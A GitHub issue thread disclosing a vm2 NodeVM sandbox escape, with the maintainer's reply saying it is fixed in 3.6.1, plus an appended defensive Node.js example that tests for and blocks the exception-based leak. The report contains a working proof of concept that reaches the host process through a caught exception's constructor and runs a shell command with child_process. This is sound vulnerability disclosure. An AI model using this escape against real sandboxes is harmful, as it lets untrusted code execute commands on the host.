VM Escape #138

eugenekolo opened this issue Jun 27, 2018 · 1 comment

@eugenekolo eugenekolo commented Jun 27, 2018

It's possible to escape the NodeVM through access to host objects, specifically through an exception. Some host objects are accessible from the VM's pseudo Nodejs events.

In fact, the next escape will always be there from somebody clever. Nodejs's vm module that this builds upon states:

> The vm module is not a security mechanism. Do not use it to run untrusted code.

I don't believe something that builds upon it can claim to be secure to untrusted code as the README states.

```js
const {NodeVM} = require('vm2');
nvm = new NodeVM();

// The template string below is the code that runs inside the sandbox.
nvm.run(`
    try {
        this.process.removeListener(); // or .on, .once, or anything that throws a host exception
    } catch (host_exception) {
        console.log('host exception: ' + host_exception.toString());
        host_constructor = host_exception.constructor.constructor;
        host_process = host_constructor('return this')().process;
        console.log('host execution: ' + host_process.mainModule.require('child_process').execSync('id').toString());
    }
`);
```

patriksimek added a commit that referenced this issue Jun 27, 2018

@patriksimek patriksimek commented Jun 27, 2018

@eugenekolo Thank you for reporting the issue; it's fixed in 3.6.1.

The statement on Node's VM module is really important because Node's internal VM is not intended to run untrusted code. That's why I started this project - to make an additional layer that makes the context secure enough to run untrusted code.

And as with every piece of software out there that claims to be secure - it is safe until someone finds a way to break it.

@eight04 eight04 mentioned this issue Jul 22, 2018
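
Added example, not part of the original thread and not vm2's own code: using only Node's built-in `vm` module, it checks whether an exception raised by a host function carries the host realm's `Function` constructor into a context, and shows one way to close that single path by rethrowing an error created inside the context. `hostThrower`, `wrapInContext` and `reachesHostGlobal` are hypothetical names, and nothing here describes how the 3.6.1 fix works.

```javascript
const vm = require('node:vm');

// Constructed host function: the Error it throws is created in the host realm.
function hostThrower() {
  throw new Error('constructed host failure');
}

// Code evaluated inside the context. It follows the caught exception's
// constructor chain and returns whatever global object that chain reaches.
const PROBE = `
  (function () {
    try { api(); } catch (e) {
      return e.constructor.constructor('return this')();
    }
  })()`;

// Build the wrapper *inside* the context so that the wrapper function and the
// Error it throws both belong to the context's realm. The host function is
// held only in the closure and is never handed to context code as a value.
// Assumption: hostFn returns primitives; return values pass through unchanged.
function wrapInContext(ctx, hostFn) {
  const makeWrapper = vm.runInContext(`
    (function (hostFn) {
      'use strict';
      return function (...args) {
        try { return hostFn(...args); }
        catch (e) { throw new Error(String(e && e.message)); }
      };
    })`, ctx);
  return makeWrapper(hostFn);
}

// Returns true when code in a fresh context can reach the host's global
// object through an exception thrown by the exposed `api` function.
function reachesHostGlobal(expose) {
  const ctx = vm.createContext({});
  ctx.api = expose(ctx);
  return vm.runInContext(PROBE, ctx) === globalThis;
}

// Exposing the host function directly leaks the host realm (the function's
// own constructor leaks it too); the context-built wrapper does not.
console.log('direct exposure :', reachesHostGlobal(() => hostThrower));
console.log('context wrapper :', reachesHostGlobal((ctx) => wrapInContext(ctx, hostThrower)));
```

This covers only the thrown-exception path; per the Node.js documentation quoted in the report, the `vm` module on its own is not a security mechanism.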